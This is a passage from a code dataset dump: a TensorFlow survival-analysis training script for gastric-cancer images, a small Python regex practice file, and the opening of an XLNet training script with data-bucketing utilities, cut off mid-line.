1])\r\n loss = tf.reduce_mean(tf.log(1 + tf.exp(s1 - s2)), name='loss')\r\n return loss\r\n\r\n def __concordance_index(self, score, time_value, event):\r\n '''\r\n Args\r\n score: \t\tpredicted score, tf tensor of shape (None, )\r\n time_value:\t\ttrue survival time_value, tf tensor of shape (None, )\r\n event:\t\tevent, tf tensor of shape (None, )\r\n '''\r\n\r\n ## find index pairs (i,j) satisfying time_value[i]<time_value[j] and event[i]==1\r\n ix = tf.where(tf.logical_and(tf.expand_dims(time_value, axis=-1) < time_value,\r\n tf.expand_dims(tf.cast(event, tf.bool), axis=-1)), name='ix')\r\n\r\n ## count how many score[i]<score[j]\r\n s1 = tf.gather(score, ix[:, 0])\r\n s2 = tf.gather(score, ix[:, 1])\r\n ci = tf.reduce_mean(tf.cast(s1 < s2, tf.float32), name='c_index')\r\n\r\n return ci\r\n def ResNet18(self,x,w_init=None, drop= 0,norm=None,is_training=True,name='res50'):\r\n with tf.variable_scope(name, reuse=tf.AUTO_REUSE):\r\n ch = 64\r\n x = tf.layers.conv2d(x, filters=ch, kernel_size=[7, 7], padding='SAME', strides=[2, 2],kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n if norm != None:\r\n x = norm(x)\r\n x = tf.nn.leaky_relu(x)\r\n\r\n conv = tf.layers.max_pooling2d(x, pool_size=[3, 3], strides=[2, 2], padding='SAME')\r\n\r\n for i in range(2):\r\n x = tf.layers.conv2d(conv, filters=ch, kernel_size=[3, 3], padding='SAME',kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n if norm != None:\r\n x = norm(x)\r\n x = tf.nn.leaky_relu(x)\r\n\r\n x = tf.layers.conv2d(x, filters=ch, kernel_size=[3, 3], padding='SAME', kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n conv = tf.nn.leaky_relu(x + conv)\r\n\r\n ch *= 2\r\n x = tf.layers.conv2d(conv, filters=ch, kernel_size=[3, 3], strides=[2,2],padding='SAME', kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n if norm != None:\r\n x = norm(x)\r\n x = tf.nn.leaky_relu(x)\r\n\r\n x = tf.layers.conv2d(x, filters=ch, kernel_size=[3, 3], padding='SAME', kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n conv = tf.nn.leaky_relu(x + tf.layers.conv2d(conv, filters=ch, kernel_size=[1, 1], strides=[2,2],padding='SAME',kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training))\r\n\r\n x = tf.layers.conv2d(conv, filters=ch, kernel_size=[3, 3], padding='SAME', kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n if norm != None:\r\n x = norm(x)\r\n x = tf.nn.leaky_relu(x)\r\n\r\n x = tf.layers.conv2d(x, filters=ch, kernel_size=[3, 3], padding='SAME', kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n conv = tf.nn.leaky_relu(x + conv)\r\n\r\n ch *= 2\r\n x = tf.layers.conv2d(conv, filters=ch, kernel_size=[3, 3], padding='SAME',strides=[2,2], kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n if norm != None:\r\n x = norm(x)\r\n x = tf.nn.leaky_relu(x)\r\n\r\n x = tf.layers.conv2d(x, filters=ch, kernel_size=[3, 3], padding='SAME', kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n conv = tf.nn.leaky_relu(x + tf.layers.conv2d(conv, filters=ch, kernel_size=[1, 1], strides=[2,2],padding='SAME', kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training))\r\n\r\n x = tf.layers.conv2d(conv, filters=ch, kernel_size=[3, 3], padding='SAME', kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n if norm != None:\r\n x = norm(x)\r\n x = tf.nn.leaky_relu(x)\r\n\r\n x = tf.layers.conv2d(x, filters=ch, kernel_size=[3, 3], padding='SAME', kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n conv = tf.nn.leaky_relu(x + conv)\r\n\r\n ch *= 2\r\n x = tf.layers.conv2d(conv, filters=ch, kernel_size=[3, 3], strides=[2,2],padding='SAME', kernel_initializer=w_init,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n if norm != None:\r\n x = norm(x)\r\n x = tf.nn.leaky_relu(x)\r\n\r\n x = tf.layers.conv2d(x, filters=ch, kernel_size=[3, 3], padding='SAME', kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n conv = tf.nn.leaky_relu(x + tf.layers.conv2d(conv, filters=ch, kernel_size=[1, 1], strides=[2,2],padding='SAME', kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training))\r\n\r\n x = tf.layers.conv2d(conv, filters=ch, kernel_size=[3, 3], padding='SAME', kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n if norm != None:\r\n x = norm(x)\r\n x = tf.nn.leaky_relu(x)\r\n\r\n x = tf.layers.conv2d(x, filters=ch, kernel_size=[3, 3], padding='SAME', kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n conv = tf.nn.leaky_relu(x + conv)\r\n\r\n feature = self.global_avg_pooling(conv)\r\n return feature\r\n\r\n def model(self, is_training = True,name='model'):\r\n\r\n with tf.variable_scope(name, reuse=tf.AUTO_REUSE):\r\n x = tf.concat(tf.split(self.x, num_or_size_splits=5, axis=-1), axis=0)\r\n x = self.ResNet18(x,w_init=self.w_init,norm=None,drop=self.drop,is_training=is_training)\r\n x = tf.concat(tf.split(tf.expand_dims(x,axis=1), num_or_size_splits=5, axis=0), axis=1)\r\n\r\n x = tf.layers.dense(x, 256, kernel_initializer=self.w_init,activation=tf.nn.leaky_relu,kernel_regularizer=self.reg,trainable=is_training)\r\n # x = self.swish(x)\r\n\r\n feature = tf.layers.dense(x, 256, kernel_initializer=self.w_init,activation=tf.nn.leaky_relu,kernel_regularizer=self.reg,trainable=is_training) #80*256\r\n # feature = self.swish(feature)\r\n\r\n a = tf.layers.dense(feature, 256, kernel_initializer=self.w_init,activation=tf.nn.tanh,kernel_regularizer=self.reg,trainable=is_training)\r\n # a = self.swish(a)\r\n b = tf.layers.dense(feature, 256, kernel_initializer=self.w_init,activation=tf.nn.sigmoid,kernel_regularizer=self.reg,trainable=is_training)\r\n\r\n A = tf.multiply(a,b)\r\n A = tf.layers.dense(A, 2, kernel_initializer=self.w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n A = tf.nn.softmax(tf.transpose(A,perm=[0,2,1]))\r\n M = tf.matmul(A,feature) #2*256\r\n\r\n\r\n with tf.variable_scope('ISP', reuse=tf.AUTO_REUSE):\r\n # logit = tf.layers.dense(M[:,0], 128, kernel_initializer=self.w_init,trainable=is_training,activation=tf.nn.leaky_relu)\r\n logit = tf.layers.dense(M[:,0], 4, kernel_initializer=self.w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n\r\n with tf.variable_scope('survival', reuse=tf.AUTO_REUSE):\r\n s = tf.layers.dense(tf.concat([M[:,1], tf.nn.softmax(logit)], axis=-1), 1, kernel_initializer=self.w_init,kernel_regularizer=self.reg,activation=tf.nn.leaky_relu)\r\n s = tf.layers.dense(s, 1, kernel_initializer=self.w_init,kernel_regularizer=self.reg)\r\n # s = tf.layers.dense(M[:,0], 1, kernel_initializer=self.w_init)\r\n\r\n return logit, s\r\n\r\n def train(self):\r\n n_epochs = 20000\r\n checkpointdir = self.param['model_save_path']\r\n ####################################################################################\r\n if not os.path.exists(checkpointdir):\r\n checkpoints_dir = checkpointdir\r\n os.makedirs(checkpoints_dir)\r\n else:\r\n current_time = datetime.datetime.now().strftime(\"%Y%m%d-%H%M\")\r\n checkpoints_dir = checkpointdir.format(current_time)\r\n ####################################################################################\r\n # Read the filename of Training dataset\r\n self.param['batchsize'] = 16\r\n\r\n ##################################################################\r\n train_data = np.load('./Dataset/Resize_data/Training.npy',allow_pickle=True)\r\n\r\n train_img = np.empty([np.uint16(len(train_data)), 160, 160, 5], dtype=np.float32)\r\n train_ISP = np.empty([np.uint16(len(train_data)), 4], dtype=np.float32)\r\n train_DFS = np.empty([np.uint16(len(train_data))], dtype=np.float32)\r\n train_st = np.empty([np.uint16(len(train_data))], dtype=np.float32)\r\n\r\n for i in range(np.uint16(len(train_data))):\r\n if i == 93 or i == 262 or i == 180:\r\n continue\r\n else:\r\n train_img[i, :, :, :] = train_data[i]['img']\r\n if train_data[i]['ISP'][0] == 1:\r\n train_ISP[i, :] = [1, 0, 0, 0]\r\n elif train_data[i]['ISP'][0] == 2:\r\n train_ISP[i, :] = [0, 1, 0, 0]\r\n elif train_data[i]['ISP'][0] == 3:\r\n train_ISP[i, :] = [0, 0, 1, 0]\r\n elif train_data[i]['ISP'][0] == 4:\r\n train_ISP[i, :] = [0, 0, 0, 1]\r\n\r\n # plt.imshow(train_img[i, :, :, 2])\r\n # plt.title(str(i))\r\n # plt.pause(.1)\r\n\r\n train_DFS[i] = train_data[i]['DFS'][0]\r\n train_st[i] = train_data[i]['st'][0]\r\n\r\n aug_bool = 1\r\n if aug_bool:\r\n train_img_aug = np.empty([np.shape(train_img)[0] * (1 + aug), Ix, Iy, 5], dtype=np.float32)\r\n train_ISP_aug = np.empty([np.shape(train_img)[0] * (1 + aug), 4], dtype=np.float32)\r\n train_DFS_aug = np.empty([np.shape(train_img)[0] * (1 + aug)], dtype=np.float32)\r\n train_st_aug = np.empty([np.shape(train_img)[0] * (1 + aug)], dtype=np.float32)\r\n\r\n iter = 0\r\n for i in range(np.shape(train_img)[0]):\r\n train_img_aug[iter, :, :, :] = train_img[i, :, :, :]\r\n train_ISP_aug[iter, :] = train_ISP[i, :]\r\n train_DFS_aug[iter] = train_DFS[i]\r\n train_st_aug[iter] = train_st[i]\r\n iter += 1\r\n for ii in range(aug):\r\n k = random.randrange(1, 7)\r\n for jj in range(5):\r\n random_augmented_image = np.array(augmentHK(train_img[i, :, :, jj], k), dtype=np.float)\r\n train_img_aug[iter, :, :, jj] = random_augmented_image\r\n train_ISP_aug[iter, :] = train_ISP[i, :]\r\n train_DFS_aug[iter] = train_DFS[i]\r\n train_st_aug[iter] = train_st[i]\r\n iter += 1\r\n else:\r\n train_img_aug = train_img\r\n train_ISP_aug = train_ISP\r\n train_DFS_aug = train_DFS\r\n train_st_aug = train_st\r\n\r\n ##################################################################\r\n valid_data = np.load('./Dataset/Resize_data/Validation.npy',allow_pickle=True)\r\n valid_img = np.empty([np.uint16(len(valid_data)), 160, 160, 5], dtype=np.float32)\r\n valid_ISP = np.empty([np.uint16(len(valid_data)), 4], dtype=np.float32)\r\n valid_DFS = np.empty([np.uint16(len(valid_data))], dtype=np.float32)\r\n valid_st = np.empty([np.uint16(len(valid_data))], dtype=np.float32)\r\n\r\n for i in range(np.uint16(len(valid_data))):\r\n if i == 124:\r\n continue\r\n else:\r\n valid_img[i, :, :, :] = valid_data[i]['img']\r\n\r\n if valid_data[i]['ISP'][0] == 1:\r\n valid_ISP[i, :] = [1, 0, 0, 0]\r\n elif valid_data[i]['ISP'][0] == 2:\r\n valid_ISP[i, :] = [0, 1, 0, 0]\r\n elif valid_data[i]['ISP'][0] == 3:\r\n valid_ISP[i, :] = [0, 0, 1, 0]\r\n elif valid_data[i]['ISP'][0] == 4:\r\n valid_ISP[i, :] = [0, 0, 0, 1]\r\n\r\n valid_DFS[i] = valid_data[i]['DFS'][0]\r\n valid_st[i] = valid_data[i]['st'][0]\r\n\r\n #####################################################################################\r\n\r\n graph = tf.Graph()\r\n with graph.as_default():\r\n config = tf.ConfigProto()\r\n config.gpu_options.allow_growth = True\r\n ####################################################################################\r\n self.x = tf.placeholder(tf.float32, [self.param['batchsize'], 160, 160, 5])\r\n self.ISP = tf.placeholder(tf.float32, [self.param['batchsize'], 4])\r\n self.DFS = tf.placeholder(tf.float32, [self.param['batchsize']])\r\n self.st = tf.placeholder(tf.float32, [self.param['batchsize']])\r\n\r\n self.epoch = tf.placeholder(tf.uint16)\r\n self.is_training = tf.placeholder(tf.bool)\r\n self.drop = tf.placeholder(tf.float32)\r\n\r\n ####################################################################################\r\n\r\n logit, s = self.model(name='model',is_training=True)\r\n\r\n ####################################################################################\r\n\r\n gene_4_cls_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(labels=self.ISP, logits=logit))\r\n\r\n score = s\r\n time_value = self.DFS\r\n event = self.st\r\n cox_value = self.cox_loss(score, time_value, event)\r\n\r\n loss = gene_4_cls_loss + 1*cox_value\r\n\r\n ci = self.__concordance_index(s, self.DFS, self.st)\r\n ####################################################################################\r\n\r\n global_step = tf.Variable(0)\r\n self.g_lr = tf.train.polynomial_decay(learning_rate=0.00005, global_step=global_step, decay_steps=500,end_learning_rate=1e-5, power=0.5, cycle=False)\r\n\r\n self.ADAM_opt = tf.train.GradientDescentOptimizer(1e-5).minimize(loss)\r\n\r\n ####################################################################################\r\n if os.path.exists('Validation.txt') and self.param['retrain']:\r\n os.remove('Validation.txt')\r\n if os.path.exists('Training.txt') and self.param['retrain']:\r\n os.remove('Training.txt')\r\n ####################################################################################\r\n with tf.Session(config=config, graph=graph) as sess:\r\n sess.run(tf.global_variables_initializer())\r\n ####################################################################################\r\n # Read the existed model\r\n if not self.param['retrain']:\r\n checkpoint = tf.train.get_checkpoint_state(checkpoints_dir)\r\n meta_graph_path = checkpoint.model_checkpoint_path + \".meta\"\r\n ckpt.load_ckpt(sess=sess, save_dir=checkpoints_dir, is_latest=True)\r\n epoch_pre = int(meta_graph_path.split(\"-\")[1].split(\".\")[0])\r\n else:\r\n sess.run(tf.global_variables_initializer())\r\n epoch_pre = 0\r\n ####################################################################################\r\n valid_taget_all = np.zeros(\r\n (self.param['batchsize'] * (np.shape(valid_data)[0] // self.param['batchsize']), 4),\r\n dtype=np.float32)\r\n valid_pprob_all = np.zeros(\r\n (self.param['batchsize'] * (np.shape(valid_data)[0] // self.param['batchsize']), 4),\r\n dtype=np.float32)\r\n\r\n train_taget_all = np.zeros(\r\n (self.param['batchsize'] * (np.shape(train_data)[0] // self.param['batchsize']), 4),\r\n dtype=np.float32)\r\n train_pprob_all = np.zeros(\r\n (self.param['batchsize'] * (np.shape(train_data)[0] // self.param['batchsize']), 4),\r\n dtype=np.float32)\r\n ####################################################################################\r\n for epoch in range(epoch_pre, n_epochs):\r\n ####################################################################################\r\n #\r\n # Training stage\r\n #\r\n ####################################################################################\r\n # self.param['batchsize'] = 8\r\n ploss_all, pgene_4_cls_loss_all, pcox_value_all, pci_all = 0, 0, 0, 0\r\n Train_Num = [i for i in range(np.shape(train_img_aug)[0])]\r\n random.shuffle(Train_Num)\r\n count = 0\r\n for iq in range(np.shape(train_img_aug)[0] // self.param['batchsize']):\r\n train_final_input = train_img_aug[Train_Num[iq * self.param['batchsize']:(iq + 1) * self.param['batchsize']],:, :, :]\r\n train_final_ISP = train_ISP_aug[Train_Num[iq * self.param['batchsize']:(iq + 1) * self.param['batchsize']], :]\r\n train_final_DFS = train_DFS_aug[Train_Num[iq * self.param['batchsize']:(iq + 1) * self.param['batchsize']]]\r\n train_final_st = train_st_aug[Train_Num[iq * self.param['batchsize']:(iq + 1) * self.param['batchsize']]]\r\n\r\n feed_dict = {self.x: train_final_input, self.ISP: train_final_ISP, self.DFS: train_final_DFS,self.st: train_final_st, self.drop: 0.5, self.epoch: epoch}\r\n\r\n _, ploss, pgene_4_cls_loss, pcox_value, pci = sess.run(\r\n [self.ADAM_opt, loss, gene_4_cls_loss, cox_value, ci], feed_dict)\r\n\r\n ploss_all += ploss\r\n pgene_4_cls_loss_all += pgene_4_cls_loss\r\n pci_all += pci\r\n pcox_value_all += pcox_value\r\n count += 1\r\n # print(plogit)\r\n\r\n print('epoch:-' + str(epoch + 1) + '\\t' + 'ploss_all:' + str(\r\n ploss_all / count) + '\\t' + 'pgene_4_cls_loss_all:' + str(\r\n pgene_4_cls_loss_all / count) + '\\t' + 'pcox_value_all:' + str(\r\n pcox_value_all / count) + '\\t' + 'pci_all:' + str(\r\n pci_all / count) + '\\n')\r\n \r\n if (epoch + 1) % 1 == 0:\r\n var_list = [var for var in tf.global_variables()]\r\n print(time.asctime(time.localtime(time.time())),\r\n 'the %d-th iterations. Saving Models...' % epoch)\r\n ckpt.save_ckpt(sess=sess, mode_name='model.ckpt', save_dir=checkpoints_dir, global_step=epoch,\r\n var_list=var_list)\r\n print(\"[*] Saving checkpoints SUCCESS! \")\r\n\r\n\r\nif __name__ == '__main__':\r\n modelX = model()\r\n modelX.train()\r\n","repo_name":"zzc623/ClassGastric","sub_path":"Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":25959,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"34039400737","text":"import os\nfrom contextlib import suppress\nimport re\n\ndef practise():\n\n with suppress(FileNotFoundError):\n # ファイルがなくてもエラーにならない\n os.remove('test.txt')\n\n sk = ('shinji', 'kawasaki', 80)\n # sk[2] = 99 # イミュータブル TypeError\n # print(sk)\n\ndef regex_practise():\n sss = '54.5△'\n _sss = re.sub(r'\\D\\Z', '', sss)\n print(_sss)\n\n pattern = re.compile(r'(\\d{3})-(\\d{3})-(\\d{3})')\n mo = pattern.search(f'123-456-789')\n print(mo.group(0))\n print(mo.group(1))\n print(mo.group(2))\n print(mo.group(3))\n\n _junk = pattern.match(f'123-456-789')\n print(_junk.group(1))\n\ndef main():\n # practise()\n regex_practise()\n\nif __name__ == '__main__':\n main()\n","repo_name":"CyberMameCAN/Python-house","sub_path":"practise.py","file_name":"practise.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"86365356437","text":"r\"\"\"Entry point for training a XLNet based model for AICUP2019 Task1.\n\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport os\nimport re\nimport sys\nimport ast\nimport csv\nimport glob\nimport gzip\nimport json\nimport math\nimport errno\nimport msgpack\nimport logging\nimport argparse\nimport datetime\nimport functools\nimport itertools\nfrom pathlib import Path\nfrom collections import defaultdict\n\n# print('some red text1', file=sys.stderr)\nimport colorama\nfrom colorama import Fore, Back, Style\n# print(Fore.RED + 'some red text2' + Style.RESET_ALL, file=sys.stderr)\ncolorama.init(\n) # this needs to run before first run of tf_logging._get_logger()\n# print(Fore.RED + 'some red text3' + Style.RESET_ALL, file=sys.stderr)\nimport tensorflow as tf\nimport tensorflow_hub as hub\n# print(Fore.RED + 'some red text4' + Style.RESET_ALL, file=sys.stderr)\nfrom tensorflow.python.ops import variables, inplace_ops\nfrom tensorflow.python.data.ops import iterator_ops\n# from tensorflow.contrib.data.python.ops.iterator_ops import _Saveable # 1.11\nfrom tensorflow.python.data.experimental.ops.iterator_ops import _Saveable # 1.12\nfrom tensorflow.core.util.event_pb2 import SessionLog\nfrom tensorflow.python.training import training_util\nfrom tensorflow.python.framework import meta_graph\nfrom tensorflow.python.data.util import nest\nfrom tensorflow.python.util.nest import is_sequence\nfrom tensorflow.contrib.layers.python.layers import adaptive_clipping_fn\nfrom tensorflow.contrib.rnn.python.ops import lstm_ops\nfrom tensorflow.core.protobuf import rewriter_config_pb2\nfrom tensorflow.python import debug as tf_debug\nfrom tensorflow.python.platform import tf_logging\nimport numpy as np\nimport coloredlogs\nfrom tqdm import tqdm\nfrom xlnet import xlnet\n\n_NEG_INF = -1e9\n\ntfversion = tuple([int(s) for s in tf.__version__.split('-')[0].split('.')])\n\n\ndef verify_input_path(p):\n # get absolute path to dataset directory\n path = Path(os.path.abspath(os.path.expanduser(p)))\n # doesn't exist\n if not path.exists():\n raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), path)\n # is dir\n if path.is_dir():\n raise IsADirectoryError(errno.EISDIR, os.strerror(errno.EISDIR), path)\n return path\n\n\ndef verify_output_path(p):\n # get absolute path to dataset directory\n path = Path(os.path.abspath(os.path.expanduser(p)))\n # existing file\n if path.exists():\n raise FileExistsError(errno.EEXIST, os.strerror(errno.EEXIST), path)\n # is dir\n if path.is_dir():\n raise IsADirectoryError(errno.EISDIR, os.strerror(errno.EISDIR), path)\n # assert dirs\n path.parent.mkdir(parents=True, exist_ok=True) # pylint: disable=no-member\n return path\n\n\nclass TqdmFile(object):\n \"\"\" A file-like object that will write to tqdm\"\"\"\n file = None\n\n def __init__(self, file):\n self.file = file\n\n def write(self, x):\n # Avoid print() second call (useless \\n)\n if len(x.rstrip()) > 0:\n # print(Fore.RED + 'some red text' + Style.RESET_ALL)\n if tfversion[0] == 1 and tfversion[1] <= 12:\n tqdm.write(x, file=self.file)\n else:\n tqdm.write(x.rstrip(), file=self.file)\n\n def flush(self):\n return getattr(self.file, \"flush\", lambda: None)()\n\n\n# Disable cpp warnings\n# os.environ['TF_CPP_MIN_LOG_LEVEL']='2'\n# Show debugging output, default: tf.logging.INFO\n\nlogger = None\nFLAGS = None\n\n\ndef pad_to_multiples(features, labels, pad_to_mutiples_of=8, padding_values=0):\n \"\"\"Nvidia Volta Tensor Cores are enabled when data shape is multiples of 8\n \"\"\"\n max_len = tf.shape(labels)[1]\n target_len = tf.cast(\n tf.multiply(\n tf.ceil(tf.truediv(max_len, pad_to_mutiples_of)), pad_to_mutiples_of\n ), tf.int32\n )\n paddings = [[0, 0], [0, target_len - max_len]]\n features['protein'] = tf.pad(\n tensor=features['protein'],\n paddings=paddings,\n constant_values=padding_values\n )\n return features, tf.pad(\n tensor=labels, paddings=paddings, constant_values=padding_values\n )\n\n\ndef bucket_by_sequence_length_and_pad_to_multiples(\n element_length_func,\n bucket_boundaries,\n bucket_batch_sizes,\n padded_shapes=None,\n padding_values=None,\n pad_to_mutiples_of=None,\n pad_to_bucket_boundary=False\n):\n \"\"\"A transformation that buckets elements in a `Dataset` by length.\n\n Nvidia Volta Tensor Cores are enabled when data shape is multiples of 8\n\n Elements of the `Dataset` are grouped together by length and then are padded\n and batched.\n\n This is useful for sequence tasks in which the elements have variable length.\n Grouping together elements that have similar lengths reduces the total\n fraction of padding in a batch which increases training step efficiency.\n\n Args:\n element_length_func: function from element in `Dataset` to `tf.int32`,\n determines the length of the element, which will determine the bucket it\n goes into.\n bucket_boundaries: `list<int>`, upper length boundaries of the buckets.\n bucket_batch_sizes: `list<int>`, batch size per bucket. Length should be\n `len(bucket_boundaries) + 1`.\n padded_shapes: Nested structure of `tf.TensorShape` to pass to\n @{tf.data.Dataset.padded_batch}. If not provided, will use\n `dataset.output_shapes`, which will result in variable length dimensions\n being padded out to the maximum length in each batch.\n padding_values: Values to pad with, passed to\n @{tf.data.Dataset.padded_batch}. Defaults to padding with 0.\n pad_to_bucket_boundary: bool, if `False`, will pad dimensions with unknown\n size to maximum length in batch. If `True`, will pad dimensions with\n unknown size to bucket boundary, and caller must ensure that the source\n `Dataset` does not contain any elements with length longer than\n `max(bucket_boundaries)`.\n\n Returns:\n A `Dataset` transformation function, which can be passed to\n @{tf.data.Dataset.apply}.\n\n Raises:\n ValueError: if `len(bucket_batch_sizes) != len(bucket_boundaries) + 1`.\n \"\"\"\n with tf.name_scope(\"bucket_by_sequence_length_and_pad_to_multiples\"):\n if len(bucket_batch_sizes) != (len(bucket_boundaries) + 1):\n raise ValueError(\n \"len(bucket_batch_sizes) must equal len(bucket_boundaries) + 1\"\n )\n\n batch_sizes = tf.constant(bucket_batch_sizes, dtype=tf.int64)\n\n def element_to_bucket_id(*args):\n \"\"\"Return int64 id of the length bucket for this element.\"\"\"\n seq_length = element_length_func(*args)\n\n boundaries = list(bucket_boundaries)\n buckets_min = [np.iinfo(np.int32).min] + boundaries\n buckets_max = boundaries + [np.iinfo(np.int32).max]\n conditions_c = tf.logical_and(\n tf.less_equal(buckets_min, seq_length),\n tf.less(seq_length, buckets_max)\n )\n bucket_id = tf.reduce_min(tf.where(conditions_c))\n\n return bucket_id\n\n def window_size_fn(bucket_id):\n # The window size is set to the batch size for this bucket\n window_size = batch_sizes[bucket_id]\n return window_size\n\n def make_padded_shapes(shapes, none_filler=None):\n padded = []\n # print('shapes', shapes)\n for shape in nest.flatten(shapes):\n # print('shape', shape)\n shape = tf.TensorShape(shape)\n # print(tf.TensorShape(None))\n shape = [none_filler if d.value is None else d for d in shape]\n # print(shape)\n padded.append(shape)\n return nest.pack_sequence_as(shapes, padded)\n\n def batching_fn(bucket_id, grouped_dataset):\n \"\"\"Batch elements in dataset.\"\"\"\n # ({'protein': TensorShape(None), 'lengths': TensorShape([])}, TensorShape(None))\n print(grouped_dataset.output_shapes)\n batch_size = batch_sizes[bucket_id]\n none_filler = None\n if pad_to_bucket_boundary:\n err_msg = (\n \"When pad_to_bucket_boundary=True, elements must have \"\n \"length <= max(bucket_boundaries).\"\n )\n check = tf.assert_less(\n bucket_id,\n tf.constant(len(bucket_batch_sizes) - 1, dtype=tf.int64),\n message=err_msg\n )\n with tf.control_dependencies([check]):\n boundaries = tf.constant(bucket_boundaries, dtype=tf.int64)\n bucket_boundary = boundaries[bucket_id]\n none_filler = bucket_boundary\n # print(padded_shapes or grouped_dataset.output_shapes)\n shapes = make_padded_shapes(\n padded_shapes or grouped_dataset.output_shapes,\n none_filler=none_filler\n )\n return grouped_dataset.padded_batch(\n batch_size, shapes, padding_values\n )\n\n def _apply_fn(dataset):\n return dataset.apply(\n tf.contrib.data.group_by_window(\n element_to_bucket_id,\n batching_fn,\n window_size_func=window_size_fn\n )\n )\n\n return _apply_fn\n\n\ndef debug_serving():\n import tensorflow as tf\n import tensorflow.contrib.eager as tfe\n tf.enable_eager_execution()\n import numpy as np\n protein_strs = tf.constant(['FLI', 'MVPA', 'GS'])\n # <tf.Tensor: id=440, shape=(3,), dtype=string, numpy=array([b'FLI', b'MVPA', b'GS'], dtype=object)>\n proteins = [\n [aa_index[a] for a in np.array(ps).tolist().decode('utf-8')]\n for ps in protein_strs\n ]\n proteins = [[1, 2, 3], [4, 5, 1, 6], [1, 2]]\n np_proteins = [np.array(p, dtype=np.uint8) for p in proteins]\n\n def make_sequence_example(protein):\n # The object we return\n ex = tf.train.SequenceExample()\n # A non-sequential feature of our example\n # sequence_length = len(protein)\n # ex.context.feature[\"length\"].int64_list.value.append(sequence_length)\n # Feature lists for the two sequential features of our example\n fl_protein = ex.feature_lists.feature_list[\"protein\"]\n for aa in protein:\n fl_protein.feature.add().bytes_list.value.append(aa.tostring())\n return ex\n\n # make_sequence_example(np_proteins[0])\n # feature_lists {\n # feature_list {\n # key: \"protein\"\n # value {\n # feature {\n # bytes_list {\n # value: \"\\001\"\n # }\n # }\n # feature {\n # bytes_list {\n # value: \"\\002\"\n # }\n # }\n # feature {\n # bytes_list {\n # value: \"\\003\"\n # }\n # }\n # }\n # }\n # }\n # serialized = make_sequence_example(np_proteins[0]).SerializeToString()\n serialized = [\n make_sequence_example(npp).SerializeToString() for npp in np_proteins\n ]\n # b'\\x12\"\\n \\n\\x07protein\\x12\\x15\\n\\x05\\n\\x03\\n\\x01\\x01\\n\\x05\\n\\x03\\n\\x01\\x02\\n\\x05\\n\\x03\\n\\x01\\x03'\n context_features = {\n # 'length': tf.FixedLenFeature([], dtype=tf.int64)\n }\n sequence_features = {\n 'protein': tf.FixedLenSequenceFeature([], dtype=tf.string)\n # uint8 is not in the list of allowed values: float, int64, string\n }\n example_names = ['t1', 'test2', 'aaa']\n context, sequence, lengths = tf.io.parse_sequence_example(\n serialized=serialized,\n # A vector (1-D Tensor) of type string containing binary serialized\n # serialized `SequenceExample` proto.\n context_features=context_features,\n # A `dict` mapping feature keys to `FixedLenFeature` or\n # `VarLenFeature` values. These features are associated with a\n # `SequenceExample` as a whole.\n sequence_features=sequence_features,\n # A `dict` mapping feature keys to\n # `FixedLenSequenceFeature` or `VarLenFeature` values. These features are\n # associated with data within the `FeatureList` section of the\n # `SequenceExample` proto.\n example_names=example_names,\n # A vector (1-D Tensor) of strings (optional), the name of\n # the serialized proto.\n name=None\n # A name for this operation (optional).\n )\n # context = {}\n # sequence = {'protein': <tf.Tensor: id=3, shape=(3, 4), dtype=string, numpy=\n # array([[b'\\x01', b'\\x02', b'\\x03', b''],\n # [b'\\x04', b'\\x05', b'\\x01', b'\\x06'],\n # [b'\\x01', b'\\x02', b'', b'']], dtype=object)>}\n # lengths = {'protein': <tf.Tensor: id=4, shape=(3,), dtype=int64, numpy=array([3, 4, 2], dtype=int64)>})\n mode = tf.estimator.ModeKeys.PREDICT\n dataset = tf.data.Dataset.from_tensor_slices(serialized)\n dataset = dataset.map(\n functools.partial(parse_sequence_example, mode=mode),\n num_parallel_calls=None\n )\n dataset = dataset.padded_batch(\n batch_size=10, padded_shapes={\n 'protein': [None],\n 'lengths': []\n }\n )\n sequences = tf.data.experimental.get_single_element(dataset)\n # sequences = {'protein': <tf.Tensor: id=328, shape=(3, 4), dtype=int32, numpy=\n # array([[1, 2, 3, 0],\n # [4, 5, 1, 6],\n # [1, 2, 0, 0]])>, 'lengths': <tf.Tensor: 